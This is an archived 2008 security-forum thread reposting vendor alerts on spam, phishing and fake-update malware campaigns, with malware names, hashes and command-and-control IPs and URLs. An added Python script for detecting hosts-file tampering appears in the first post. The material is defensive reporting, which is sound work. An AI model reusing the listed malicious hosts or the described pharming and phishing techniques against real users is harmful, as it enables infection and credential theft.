SPAM frauds, fakes, and other MALWARE deliveries - archive
AplusWebMaster
2008-02-01, 12:38
FYI...
- http://preview.tinyurl.com/3xqd9o
January 31, 2008 (Infoworld) - "...The Anti-Phishing Working Group (APWG) said in a new report* Thursday that it saw a sharp rise in November in malware that directs users to DNS servers controlled by phishers. DNS servers play a crucial role in locating Web sites. The servers translate a domain name into an IP address, enabling a Web site to be located and accessed through a browser. Often, the phishers will set up their own DNS server that works fine most of the time but can redirect to their own malicious site. Tainting a person's DNS settings is particularly dangerous since the user probably won't notice the redirection, the APWG said. "The fraudulent server replies with 'good' answers for most domains; however, when they want to direct you to a fraudulent one, they simply modify their name server responses," the report said. Phishers are also employing malware that modifies an internal PC file called the hosts, which is used to match domain names of Web sites with IP addresses. When a person visits a Web site, the browser checks the hosts to see if it has an IP address for a particular domain name. If the hosts file is corrupted or hijacked, the browser can be directed to fetch a different Web page than the one the user intended to go to. Both attacks -- also known as pharming -- are dangerous, since a user may be typing in the correct URL but be directed to the phishing site..."
* PDF file: http://www.antiphishing.org/reports/apwg_report_nov_2007.pdf
Also see:
> http://forums.spybot.info/showpost.php?p=156715&postcount=8
:fear::spider:
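The hosts-file hijack described in the APWG report above can be spotted by inspecting the file itself. The script below is an added example (not from the report or this post): it parses hosts-file text, using a constructed sample, and flags any hostname that is pinned to a routable address (silent redirection without a DNS lookup) or sunk to loopback (commonly done to block security-vendor update sites).

```python
"""Flag the kind of hosts-file tampering that pharming malware performs.

Added example (not from the APWG report): parses hosts-file text and
reports any hostname pinned to a routable address (the browser is silently
redirected without any DNS lookup) or sunk to loopback (commonly done to
block security-vendor update sites). The sample file below is constructed.
"""
import ipaddress

PINNED = "pinned to routable address (possible pharming)"
SINKHOLED = "sunk to loopback (possible update blocking)"

# Names that legitimately map to loopback in a stock hosts file.
BENIGN_LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
                         "ip6-localhost", "ip6-loopback"}

# Constructed sample modelled on a tampered Windows hosts file.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
# --- lines below are the constructed 'malicious' additions ---
203.0.113.45    www.example-bank.com   # placeholder domain, TEST-NET address
203.0.113.45    example-bank.com
127.0.0.1       update.example-av.com
"""


def parse_hosts(text):
    """Yield (address, hostname) pairs, ignoring comments and blank lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:
            yield fields[0], name.lower()


def suspicious_entries(text):
    """Return (address, hostname, reason) for every entry worth a closer look."""
    findings = []
    for ip, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((ip, name, "unparseable address"))
            continue
        if addr.is_loopback or addr.is_unspecified:
            # Loopback is normal only for the stock localhost-style names.
            if name not in BENIGN_LOOPBACK_NAMES:
                findings.append((ip, name, SINKHOLED))
        else:
            # Any other address is used by the OS instead of asking DNS at all.
            findings.append((ip, name, PINNED))
    return findings


if __name__ == "__main__":
    for ip, name, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"{name:28} -> {ip:15} {reason}")
```

On a real system, feed it the contents of C:\Windows\System32\drivers\etc\hosts or /etc/hosts; any finding for a bank, mail or security-vendor name deserves the same treatment as a rogue DNS setting.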
AplusWebMaster
2008-03-30, 15:09
FYI...
Speed up your PC! for FREE!
- http://www.sophos.com/security/blog/2008/03/1072.html
27 March 2008 - "What’s the easiest (and cheapest) way to get a faster computer?... numerous tools and applications insist on clogging up their system drive with poorly written uninstallers, gigabytes of temporary files and those annoying startup agents that load with Windows and sit resident in memory just in case they’re needed. It’s common, then, for these users to turn to third-party tools to clean up their computers. For the most part, these tools work pretty well. However, these programs are not always what they seem... To the unsuspecting computer user, this software looks like the perfect thing to clean up their computer. It appears simple, easy to use, small and free. Just the sort of thing we’re looking for, right? Wrong! This tool will “optimise” your computer by deleting a lot of critical system files. The end result is that your computer is rendered unbootable and you’re left hoping that you have made a full system backup recently... this malicious program is detected by Sophos as Troj/Sysdel-B..."
Fake shooting scam used in Trojan attack
- http://www.sophos.com/security/blog/2008/03/1238.html
29 March 2008 - "... SophosLabs noticed a new scam designed to fool users into viewing a web site where they would be hit with a malicious script that installs a spy Trojan. We saw several spam messages alerting users to the supposed shooting of the e-Gold founder... A variety of domains have been used in the scam. Browsing to each of the domains redirects to a malicious page on another server... The script attempts to exploit several client-side vulnerabilities in order to download and install a Trojan... Specific detection for the Trojan and the files it installs has been added as Troj/Agent-GUJ. This is yet another example of the attackers using a blend of spam and malicious web sites to infect victims..."
Swim in $$$ = Swim with Sharks!
- http://www.sophos.com/security/blog/2008/03/1237.html
28 March 2008 - “Im ************, i swim in money $$$
I want you to swim with me!!! send this file to all friends and join me!!”
If you are swimming with Troj/Nymod-A and looking at what appears to be the random picture of some person, you are definitely swimming with the sharks. Troj/Nymod-A drops a file called ^^^^^.exe (proactively detected by Sophos as Mal/Basine-C) and sets it to autostart every time you reboot your computer. File ^^^^^.exe has process monitoring which just respawns itself if you kill the handle running ^^^^^.exe. Finally it tunnels through your firewall and contacts a remote server whose domain ends in “.ru”! This has opened your computer to the $$$ sharks who might steal information from you, or steal your computer’s resources = $$$ for them."
(Screenshots available at each URL above.)
:fear::spider:
AplusWebMaster
2008-06-09, 15:25
FYI...
More fake "Hallmark ecards"...
- http://blog.trendmicro.com/greeting-cards-spread-no-cheer/
June 9, 2008 - "Thinking that someone just remembered you and sent you a Hallmark greeting card? Think again, before you open the email attachment. Today, we received a spam allegedly from Hallmark. Once you run the file named postcard.exe, it will automatically open Notepad with some garbage characters to distract users while the malware is being installed... Trend Micro detects this malware as TROJ_INJECTOR.DD... The malware drops copies of itself and creates registry entries to ensure its automatic execution at every system startup. This is not the first time malware authors tried to trick users by exploiting their curiosity and desire to receive good tidings via greeting cards: Storm started out much the same way, including the use of eCards, and well into 2007."
---------------------------------
Phishers drop MySpace bait
- http://blog.trendmicro.com/phishers-drop-myspace-bait/
June 9, 2008 - "...new phishing attack that leads to the download of malware. However, unlike most instances where phishing baits are usually banks, credit unions or other financial institutions, this time it uses the popular social networking Web site MySpace.com. The phishing URL may be contained in spammed email messages. Once recipients of said messages click or visit the URL, it displays a spoofed MySpace login page. It also uses a popup window declaring a supposed MySpace profile object error and requires that the user download the new version of a new MySpace profile object. Therein lies the trick: When the user clicks the “continue” button, malicious files are not only downloaded but also automatically installed. The said malicious files are detected as TROJ_ZLOB.GUZ and BKDR_IRCBOT.BGY... And if the user tries to exit the page, it will not close until the said file is downloaded. To exit, a user needs to terminate the program using Task Manager... phishing URL hxxp ://{BLOCKED}ce404-error.farvista.net/myspace.php ..."
(Screenshot available at the TrendMicro URL above.)
:fear::fear:
AplusWebMaster
2008-07-04, 22:18
FYI...
- http://securitylabs.websense.com/content/Alerts/3130.aspx
07.04.2008 - "Websense® Security Labs™ ThreatSeeker™ Network has discovered a substantial number of spam messages utilizing a social engineering tactic that lures users to download malicious software... The recent media coverage discussing Osama Bin Laden seems to have prompted spammers to quickly recycle an old spam campaign... We have seen the same malicious executable used throughout different spam campaigns bearing the following email subject lines:
Jennifer Aniston Interesting mp3!!!
Clara Morgane Shocking photo!!!
Kylie Minogue Interesting video without cowards!!!
Demi Moore New sexy songs!!!
Avril Lavigne Shocking porno dvd!!!
Nicole Richie Kick-up cd!!!
Beyonce Shocking sexy songs!!!
Keira Knightley Gallery photo!!!
Britney Spears Interesting cd!!! ..."
(Screenshots available at the URL above.)
:fear::spider::sad:
AplusWebMaster
2008-07-29, 19:42
FYI...
Attachment contains same Trojan horse that stole 1.6M records from Monster.com last year
- http://preview.tinyurl.com/66ayhz
July 28, 2008 (Computerworld) - "Several airlines, including Delta Air Lines Inc. and Northwest Airlines Corp., have warned customers that bogus e-mails posing as ticket invoices contain malware and urged them to immediately delete the messages. A researcher at McAfee Inc. confirmed the campaign in a post to the company's blog*. The e-mails, which purport to be from an airline, thank the recipient for using a new "Buy flight ticket Online" service on the airline's site, provide a log-in username and password, and say the person's credit card has been charged an amount usually in the $400 range. An attachment claims to be the invoice for the ticket and credit card charge..."
* http://www.avertlabs.com/research/blog/index.php/2008/07/25/invoice-spam-takes-flight/
:fear:
AplusWebMaster
2008-07-31, 14:05
More of same...
- http://www.f-secure.com/weblog/archives/00001477.html
July 30, 2008 - "... Today when we saw a large spam run sending out fake JetBlue etickets... The mail contains a ZIP file that contains the file eTicket#1721.exe which we detect as Trojan-Spy:W32/Zbot.QO. The malware itself tries to steal usernames and passwords to online banks..."
(Screenshot available at the F-secure URL above.)
- http://www.us-cert.gov/current/#airline_e_ticket_email_attack
July 31, 2008
:fear:
AplusWebMaster
2008-08-05, 13:32
FYI...
- http://isc.sans.org/diary.html?storyid=4828
Last Updated: 2008-08-05 00:45:33 UTC - "If you missed last week's chance to get your "airplane ticket", you currently have a second opportunity. Emails are making the rounds that claim to come from CNN, and carry a subject of "CNN.com Daily Top 10". Well, they are neither. But the emails contain click-friendly headlines with enticing subjects like "Will all Americans be obese by 2030?" Now who wouldn't want to read THAT?!
Clicking takes you to the netherworld, of course. You currently receive a file called "get_flash_update.exe" (yeah, sure!). Detection for the sample is coming on line, see http://www.virustotal.com/analisis/258fbdfb7eb6ecfedbf236533b03c945
[Result: 10/35 (28.57%)]
The domain "idoo .com" seems to be up to no good. Other involved domains are too numerous to list, but about 50 of them currently resolve to 200.46.83.233. That's in Panama."
:fear:
AplusWebMaster
2008-08-05, 22:42
FYI...
Phishers play the Olympics
- http://blog.trendmicro.com/phishers-play-the-olympics/
08.04.2008 - "Olympic tickets anyone? They are available on the Internet of course, but users beware: the bad guys are still working hard to steal from online users as the 2008 Beijing Olympics approach... fake Beijing Olympics Web site supposedly selling tickets. The Los Angeles Times reports* that Olympics officials have already asked federal courts to shut down certain Web sites that pose as sellers of tickets but actually are stealing credit card numbers and other confidential information..."
* http://www.latimes.com/technology/la-sp-olytickets2-2008aug02,0,7568966.story
- http://securitylabs.websense.com/content/Alerts/3152.aspx
08.05.2008 - "Websense... has discovered a rogue Beijing Olympics ticket lottery Web site. The Web site uses the hostname beij***2008.cn, a clear typo-squat to the official Olympic Games Web site at http://www.beijing2008.cn/. Benefiting from the hype around the purchasing of tickets for the Games, the social engineering tactic behind this scam is to lure users into dialling a toll number to retrieve an access code for an available ticket. The toll number is likely an additional revenue generator for the scammers as callers would then be charged a premium rate for making that phone call. Users who input the supplied access code are forwarded to a further Web page designed to collect personal information. They then have the incentive to enter credit card details, to pay a relatively small sum of RMB600 for the ticket (approximately 87 USD). This phishing Web site goes a step further than most phishing sites by employing a phone-call "verification" step. This higher level of interactivity and supposed verification garners more trust from unsuspecting users..."
(Screenshots available at the TrendMicro and Websense URLs above.)
:fear::mad::sad:
AplusWebMaster
2008-08-06, 05:03
FYI...
FAKE Adobe Flash Player
- http://www.us-cert.gov/current/#malware_targeting_adobe_flash_player
August 5, 2008 - "Adobe has issued a Security Bulletin* warning of malware spreading via a fraudulent Flash Player installer. Adobe warns that a worm is making fraudulent posts on social networking sites. These posts include links that lead to fake sites that prompt users to update their versions of Flash Player. If users attempt to use the installer to make the update, malware may be downloaded and installed onto their systems..."
* http://blogs.adobe.com/psirt/2008/08/verifying_installers.html
"...do -not- download Flash Player from a site other than adobe.com... If the download is from an unfamiliar URL or an IP address, you should be suspicious..."
:fear::mad:
AplusWebMaster
2008-08-06, 19:06
More...
Compromised Web Servers Serving Fake Flash Players
- http://ddanchev.blogspot.com/2008/08/compromised-web-servers-serving-fake.html
August 05, 2008 - "...This campaign serving fake flash players is getting so prevalent these days due to the multiple spamming approaches used, that it's hard not to notice it - and expose it... As far as the owners are concerned, it appears that some of them are already seeing the malware page popping up at the top of their daily traffic stats, and have taken measures to remove it... The structure of the malware campaign is pretty static, with several exceptions where they also take advantage of client-side vulnerabilities (Real player exploit) attempting to automatically deliver the fake flash update or player depending on the campaign. On each and every site, there are dnd.js and master.js scripts which serve the rogue download window, and another .html file, where an IFRAME attempts to access the traffic management command and control, in a random URL it was 207.10.234.217/cgi-bin/index.cgi?user200. A sample list of participating URLs, most of which are still active and running... (the list is way too long to post here - see ddanchev.blogspot URL above.)...
Sample detection rate : flashupdate.exe
Scanners Result: 35/36 (97.23%)
Trojan-Downloader.Win32.Exchanger.hk; Troj/Cbeplay-A
File size: 78848 bytes
MD5...: c81b29a3662b6083e3590939b6793bb8
SHA1..: d513275c276840cb528ce11dd228eae46a74b4b4
The downloader then "phones back home" at 72.9.98.234 port 443 which is responding to the rogue security software AntiSpy Spider...
Sample detection rate : antispyspider.msi
Scanners Result: 11/35 (31.43%)
FraudTool.Win32.AntiSpySpider.b;
File size: 1851904 bytes
MD5...: 2f1389e445f65e8a9c1a648b42a23827
SHA1..: e32aa6aa791e98fe6fdef451bd3b8a45bad0acd8
The bottom line - over a thousand domains are participating, with many others apparently joining the party proportionally with the web site owners' actions to get rid of the malware campaign hosted on their servers."
---
* http://www.adobe.com/go/getflashplayer
Current Adobe Flash Player version 9.0.124.0
:fear::fear:
AplusWebMaster
2008-08-08, 18:03
FYI...
Bogus CNN Custom Alerts
- http://securitylabs.websense.com/content/Alerts/3154.aspx
08.08.2008 - " Websense... has discovered replica CNN Custom Email Alerts being sent out via spam emails. These emails contain links to a legitimate news page, but have been designed to encourage users to download a malicious application posing as a video codec. Over the last few days, the ThreatSeeker Network has seen huge volumes of spam wrapped up in CNN-themed templates - most recently email alerts listing the Daily Top 10 Stories and Videos, which also encouraged users to download a video codec (again a malicious file)... The malicious payload is only accessed when the user clicks on the ‘FULL STORY’ link - the first link behind the story title leads to a legitimate news page hosted on CNN. The news story is a recent article centered around the Beijing Olympics. The ‘FULL STORY’ link takes users to a Web page by the name of cnn****.html. This issues a pop-up encouraging users to download a ‘missing’ video codec, a file called adobe_flash.exe... Our Security Labs have also seen evidence of this campaign and recent others being distributed via blog spam to further increase the chance of success..."
(Screenshots available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2008-08-11, 16:19
FYI...
IM: Instant Malware... Yahoo! Messenger fraud
- http://blog.trendmicro.com/instant-malware/
08.10.2008 - "Instant messaging (IM) applications are popular infection vectors — malware authors are known to use instant messaging platforms to spread malware by sending either malicious files or URLs. Trend Micro researchers have recently witnessed spammed email messages that use the popular IM application Yahoo! Messenger in propagating malware, but in a very different way than previously mentioned... Clicking the Download now link downloads the file msgr8.5us.exe into the affected system. When executed, it drops the following files:
* mirc.ini - detected by Trend Micro as Mal_Zap
* csrss.exe - detected by Trend Micro as BKDR_ZAPCHAST.AX
* sup.exe - detected by Trend Micro as BKDR_MIRCHACK.CE
For targeted victims who do, in fact, use Yahoo! Messenger, the promised update may prove hard to resist. The same email message even instructs users to pass the news to friends by sending them the source - not very friendly if the supposed update would lead one’s contacts to malware... Downloading from the software vendors themselves still is the safest way to go."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2008-08-14, 00:29
FYI...
Bogus CNN/MSNBC news...
- http://securitylabs.websense.com/content/Alerts/3159.aspx
08.13.2008 - "Websense.... has discovered a new replica wave of 'msnbc.com - BREAKING NEWS' alerts that are being sent out via spam emails. Similar to previous attacks related to 'Bogus CNN Custom Alerts', these emails contain links to a legitimate news page, but are designed to encourage users to download a malicious application posing as a video codec... Over the last few days, the ThreatSeeker Network has seen huge volumes of spam wrapped up in CNN-themed templates - most recently email alerts listing the different popular events and news articles, which also encouraged users to download a video codec, which was actually a malicious file. (The malicious payload is only accessed when the user clicks on the ‘breakingnews.msnbc.com’ link, which takes users to a Web page named up.html. This page issues a pop-up encouraging users to download a ‘missing’ video codec, a file called adobe_flash.exe.)
Here are a few examples of the varied subjects we have seen in this campaign:
msnbc.com - BREAKING NEWS: Michael Phelps wins 10th career gold, making him the winningest Olympian in history
msnbc.com - BREAKING NEWS: China beats out U.S. for gold in women's team gymnastics
msnbc.com - BREAKING NEWS: Dark Knight establishes dominance with 400 million mark
msnbc.com - BREAKING NEWS: How to save money on gas
msnbc.com - BREAKING NEWS: Preliminary polls for the election
msnbc.com - BREAKING NEWS: McDonald's found to breach FDA regulations, suspended from trading
msnbc.com - BREAKING NEWS: Jury duties for you
msnbc.com - BREAKING NEWS: Find out how to get top returns for your money at minimum risk
msnbc.com - BREAKING NEWS: Abortion outlawed in California
msnbc.com - BREAKING NEWS: Buy gold at lowest prices and make immediate profits
msnbc.com - BREAKING NEWS: Anthrax case solved
msnbc.com - BREAKING NEWS: Arsenal buys Ronaldo from Man Utd
msnbc.com - BREAKING NEWS: Too much freedom will destroy America
msnbc.com - BREAKING NEWS: Copycat murderer beheads woman on Greyhound bus
msnbc.com - BREAKING NEWS: NASDAQ index gains 720 points overnight upon war announcement
msnbc.com - BREAKING NEWS: Sony announces replacement to successful PSP gaming system
msnbc.com - BREAKING NEWS: Americans loves to sue people
msnbc.com - BREAKING NEWS: Please give your opinions for change
msnbc.com - BREAKING NEWS: Sandwich recall amid Salmonella outbreak ..."
(Screenshots available at the Websense URL above.)
- http://www.f-secure.com/weblog/archives/00001485.html
August 13, 2008 - "...Apparently people stopped clicking on -fake- CNN links as today the attackers switched the mails to look like they are now coming from MSNBC..."
CNN and MSNBC Olympic spoof emails - 5 million spam messages per hour
- http://securitylabs.websense.com/content/Blogs/3160.aspx
08.14.2008
:fear::mad:
AplusWebMaster
2008-08-15, 14:39
FYI...
- http://preview.tinyurl.com/5wqxqt
08-14-2008 (Symantec Security Response Blog) - "...With infections dating back to January 2007 and a P2P structure largely unchanged in about a year, Peacomm continues to evolve and infect new hosts. In early August our honeypots began capturing a new version of Peacomm. This iteration has been relatively low key as it propagates via users visiting infected Web sites, rather than by spam. Although Peacomm has been distributed via infected Web sites in the past, they were usually Web sites that were spammed to users as opposed to relying on drive-by downloading to gather its new recruits. The attack toolkit used to install Peacomm in these drive-by attacks has changed as well. The infection begins with a user visiting an infectious Web site, which silently -redirects- the user to hostile content on a set of registered domains via an IFRAME. At this point, Kallisto TDS will serve a set of exploits against the victim. These include Acrobat PDF CollectEmailInfo*, ANI Header Size**, and MDAC***..."
* http://www.securityfocus.com/bid/27641/solution
** http://www.securityfocus.com/bid/23194/info - MS07-017
*** http://www.securityfocus.com/bid/17462 - MS06-014
> AKA CME-711 - http://cme.mitre.org/data/list.html#711
:fear::fear:
AplusWebMaster
2008-08-18, 01:47
FYI...
- http://isc.sans.org/diary.html?storyid=4913
Last Updated: 2008-08-17 21:43:58 UTC - "The spoofed CNN and MSNBC messages from last week have altered a bit, taking on a more generic approach. The subject of the message is still: BREAKING NEWS. Michael has been tracking these botnets for a while, his work is available here: http://www.vivtek.com/projects/despammed/stormspam.html .
Like the others, this first stage is a downloader, still reaching out to 66.199.240.138* to get the rest of the goodies. Unlike the previous waves, the first executable is named install.exe instead of adobe_flash.exe..."
* http://centralops.net/co/DomainDossier.aspx
canonical name: 66-199-240-138.reverse.ezzi.net.
Registrant: EZZI.net
A Service of AccessIT
75 Broad Street
Suite 1902
New York, NY 10004 US
Domain Name: EZZI.NET
:fear::fear:
AplusWebMaster
2008-08-18, 17:29
FYI...
Fake FedEx emails
- http://securitylabs.websense.com/content/Alerts/3161.aspx
08.18.2008 - "...The notifications claim to be from FedEx and explain that a package sent by the recipient in the past month was not delivered. The message has an attachment claimed to be a copy of the invoice. The attachment is in a zip file but is actually a Trojan Downloader. This spam wave is a continuation of an ongoing theme used in recent months of using a parcel service invoice as the social engineering attack vector..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2008-08-19, 14:25
FYI...
Facebook - Viral SPAM
- http://securitylabs.websense.com/content/Blogs/3162.aspx
08.18.2008 - "... We've had to create numerous tools and methods to detect these types of attacks because most Web 2.0 social networking sites are difficult to track due to limited public access to most accounts. Most social networking accounts can only be viewed if the account holder explicitly accepts or requests another account to be added as a "friend". A generic Web crawler and even a search engine Web crawler would not be able to mine the pages on a social networking site due to lack of permission... attacks on Facebook and MySpace are nothing new. There have been continual, targeted Facebook attacks for some time now... A very enticing email was sent to one of our test accounts, letting us know that something had been written about us, and that we'd probably want to read more about it. An average user would probably want to know what was written about them, especially because it's on a public blog such as blogspot. Most users have an enormous amount of trust in their fellow Facebook friends. So, the chances of a user clicking on one of these emails are tremendously high. The attackers in this case were able to legitimately have Facebook send a spam email by compromising an account that the test user was "friends" with, and writing a comment on the test user's wall. Writing on the wall triggered an automatic email to the test user's email account with the message that was written on the wall. So, in this case Facebook wall writing is being used as a mechanism to send spam... this particular attack has been going on for over six months. The phishing URL... was registered in July 2008, but several domains have been used in this ongoing attack. Its nameserver is responsible for a load of other phishing domains, including numerous MySpace phishing pages. Users are clicking on these links manually, either when they receive them in email or read them on their walls. They click on the link, get redirected to a phishing page, and manually input their credentials.
Attackers are then using their credentials to post manually and perhaps automatically to their wall, as well as their friends' walls, allowing them to spread within the walls of the social networking world. As social networking sites become the place where the majority of Web users are spending the majority of their Internet time, we're going to see more and more MySpace, Facebook, and other social networking attacks. Web 2.0 Web sites open up a huge attack vector to exploit transitive trust. Attackers know it, and are actively taking advantage of it.
References:
http://pi3141.wordpress.com/2008/08/16/facebook-phishing-warning/
http://www.matthewbigelow.com/2008/08/18/watch-out-for-the-fanebook-facebook-forgery/
http://thenextweb.org/2008/08/10/facebook-under-massive-phishing-attack-from-china/ "
(Screenshots available at the Websense URL above.)
:fear::fear:
AplusWebMaster
2008-08-20, 16:07
FYI... (Screenshot available at the URL below.)
- http://blog.trendmicro.com/photobucket-gets-phished/
August 19, 2008 - "Photobucket is, by far, one of the largest photo-sharing sites in the world. It is generally used for personal photographic albums, remote storage of avatars displayed on Internet forums, and storage of videos. Lots of people may like to keep their albums private, allowing password-protected guest access, or open them up to the public. And now this photo-sharing site is being attacked by phishers... The login page above looks exactly like the original site that lures the users to enter their user name and password. Once victims enter their credentials, phishers can use them to obtain full access to their Photobucket account, and may use their albums to insert malicious code... popular image hosting sites have become the targets of several different attacks:
Turkish Hackers Relive Memories in Photobucket
- http://blog.trendmicro.com/turkish-hackers-relive-memories-in-photobucket
06.25.2008
Two New Yahoo Phish Sites
- http://blog.trendmicro.com/two-new-yahoo-phish-sites ..."
07.31.2008
:fear::fear:
AplusWebMaster
2008-08-21, 18:11
FYI...
Russia-Georgia conflict - malware SPAM
- http://www.us-cert.gov/current/#malware_circulating_via_russia_georgia
August 21, 2008 - " US-CERT is aware of public reports* of malware circulating via spam email messages related to the Russia/Georgia conflict. These messages contain factual information about the conflict. The messages also contain download instructions for the user to watch a video that is attached to the message. If a user opens the attachment, malware may be downloaded and installed onto their system..."
* http://preview.tinyurl.com/58u83x
08-21-2008 (Symantec Security Response Blog)
Russia/Georgia Conflict News Used to Hide Malicious Code in Spam
"...The messages themselves contain an attachment, along with instructions and passwords for the download of the attachment... One subject line that has been seen reads:
“Subject: Journalists Shot in Georgia”... The attachment contains no videos; rather, the attachment redirects to a link that delivers a payload identified as Trojan.Popwin... We have observed several -million- instances of this particular spam attack delivering malicious code..."
:fear::spider::fear:
AplusWebMaster
2008-08-22, 00:20
FYI...
- http://sunbeltblog.blogspot.com/2008/08/continuing-creativity-in-trojan.html
August 21, 2008 - "We’ve seen the same trojan being sent to inboxes in all kinds of ways — and seemingly obsessively on the subject of Angelina Jolie. Minor shift, now they’re putting the fake codec window right in the spam. Pushes video.avi.exe, a fake alert trojan which invariably installs Antivirus XP 2008 or some such rogue security program."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2008-08-26, 18:18
FYI...
- http://isc.sans.org/diary.html?storyid=4927
Last Updated: 2008-08-24 18:15:34 UTC - "I received an email today from a reader (thank you) who reported that they received a piece of spam today that came from the address: monitoring @isp.com. (Notice the domain name.) Now, we have seen this type of spam before, you know, perpetrating like it comes from your ISP while just having a malicious link in it, etc. Except this time the spam was signed "ISC monitoring team" (Notice the first three letters, and how they differ from the domain name). So I am guessing that someone is trying to imitate us. And while we recognize that imitation is the sincerest form of flattery, this kind could be actually damaging. Rest assured our faithful readers, this is not from us. First of all our email addresses are not "isp.com", nor "monitoring". We don't sign our emails "ISC monitoring team". Nor do we spell the word "Consortium" -- "Consorcium" (misspelling from the email)..."
- http://www.f-secure.com/weblog/archives/00001488.html
August 26, 2008 - "This morning we saw several spam runs in the country of Denmark. The messages are in Danish and they are sent to Danish e-mail addresses. The e-mail claims to be from us. It's not. Here's what the email looks like:
From: supportupdate@f-secure.com
Date: 26. August 2008 08:31
Subject: Data is attached and sent with this message.
Dear customers!
Invoice
Data is attached and sent with this message.
I use the free F-Secure antispam version, which has already removed 338 spam messages.
Antispam is completely free for private users.
Attachment: f-secure.rar
The attachment contains a file called update26.08.2008.exe, which, when run, drops a file called dcbcg.exe (Unker-related trojan) that connects to a server in Ukraine. We detect this trojan as Trojan:W32/Agent.FVO... The spam run must have been fairly large, as we've received more than 13,000 bounces to supportupdate @f-secure.com from non-existent email addresses alone..."
:fear:
AplusWebMaster
2008-08-27, 22:32
FYI...
‘Want to Know Who Deleted You on MSN Live?’
- http://blog.trendmicro.com/want-to-know-who-deleted-you-on-msn-live/
Aug. 26, 2008 - "While monitoring countless sites as part of our current Web threat strategy, we have stumbled upon a legitimate-looking prompt from MSN Live Messenger... or so it would appear (at first). As shown from the screen captures below, this prompt bears a close resemblance to the actual prompt being displayed by the MSN Live Messenger instant messaging application (also known as Windows Live Messenger) whenever a friend from the user’s friends list logs in. Potential victims who unfortunately encounter the site (Borradito.com) via spam or spammed IM is first enticed by the Web site’s description, which promises the capability to view which of their friends have removed them from their friends list, provided they are logged in, of course—a pretty convincing trick to lure users to key in their user names and passwords. As the Web site is accessed, a message prompt from MSN Live Messenger appears at the lower-right part of the screen, just below the system tray... Once users click on the prompt, they are diverted to a Flash-based window which also resembles an actual MSN group chat window... This routine is used to attract the users, as well as to build credibility. If the user goes back to the main site and enters their credentials, the site displays a list of users who have allegedly removed the affected user from their contact lists... What happens under the radar, however, is that the site captures the entered credentials and the accounts are then opened by a remote malicious user and IM messages containing a link to the Borradito phishing site are sent to all contacts on the affected account’s buddy list... This ensures further propagation of this threat. Directly at risk are MSN users and their contacts. The account information harvested in this account may be used to access various Windows Live services such as Windows Live Call (PC-to-phone calls), SkyDrive (file-sharing services), Spaces, and even Hotmail accounts under the same account. 
Today, your email accounts hold many important tidbits on different aspects of your life, job, and personal details many people would prefer not to be divulged to others. Letting your guard down can be very costly and can lead to exploitation. The worst possible scenarios include identity theft and financial loss..."
(Screenshots available at the URL above.)
:fear:
AplusWebMaster
2008-08-28, 13:02
FYI...
Critical Update: Please Patch Windows with Malware
- http://blog.trendmicro.com/critical-update-please-patch-windows-with-malware/
Aug. 27, 2008 - "After patching 11 vulnerabilities for this month’s Patch Tuesday, spam is being sent that falsely claims that the recipient should immediately install another critical Microsoft update... Patching one’s system using this spam as guidance, however, downloads a multitude of badness, and one particular malicious piece of malware which is detected as EXPL_ANICMOO.GEN... Malware writers are counting on the urgency of the email’s tone to trick recipients into applying the “patch”..."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2008-08-31, 17:09
FYI...
Treasury Optimizer - malware update
- http://blog.trendmicro.com/treasury-optimizer-updates-systems-with-malware/
Aug. 30, 2008 - "Treasury Optimizer is an online banking tool offered by Capital One Bank which aims to provide secure access to business accounts on the Web, 24/7. Posed to replace electronic money or more popularly known as eCash, it offers to protect customers’ accounts through security features such as multifactor authentication. Unfortunately, their security offerings come short, as we receive bulks of phishing emails that “promote” the Treasury Optimizer. The phishing mail instructs the client to update their account due to a potential security risk that affects all of Capital One Bank products, including the Treasury Optimizer... The conventional phishing attack aims to capture users’ credentials through fake login pages spammed through email. For this attack however, the phishing link given in the phishing email leads to a page that does not ask for credentials, but tells the user to download a file instead. When the user clicks the link contained in the phishing email, the following spoofed Treasury Optimizer Web page is displayed... The page explains that the bank had to fix (the) vulnerability; and in order to fix it, the client MUST download the update. It even displays different download links for different operating systems. It will then download an .EXE file that poses as an installation setup... The downloaded file is detected by Trend Micro as TROJ_SMALL.MAT. This malware-enhanced phishing attack is neither the typical type of phishing attack, nor is it less dangerous. The scope of a phishing attack is usually limited; one account from a target organization compromised in every successful attack. But this phishing attack installs a malware on the affected user’s system instead, and then uses it to monitor users’ online activities, thus possibly disclosing more information..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2008-09-03, 23:28
FYI...
Fake celebrity news SPAM - Malicious Code
- http://securitylabs.websense.com/content/Alerts/3172.aspx
9.03.2008 - "...ThreatSeeker Network has seen huge volumes of spam wrapped up in CNN and MSNBC themed templates. Recently, email alerts listing different popular events and news articles also encouraged users to download a video codec, which was actually a malicious file... The malicious payload is only accessed when the user clicks on the 'READ FULL STORY' link, which takes them to a Web page on a compromised site named index97.html, which issues a pop-up encouraging users to download a ‘missing’ video codec, a file called video98.exe... Here are a few examples of the varied subjects we have seen in this campaign:
Sensational news. Check the message.
Breaking news! Be the first to know.
Very important news.
Astonishing Please take a look.
Sensational information inside.
Check this out. This is a bomb
This is really great news. Please check. ..."
(Screenshots available at the Websense URL above.)
:fear:
AplusWebMaster
2008-09-05, 00:26
FYI...
Misleading Application Targets Free Online Services
- http://www.securityfocus.com/blogs/1018
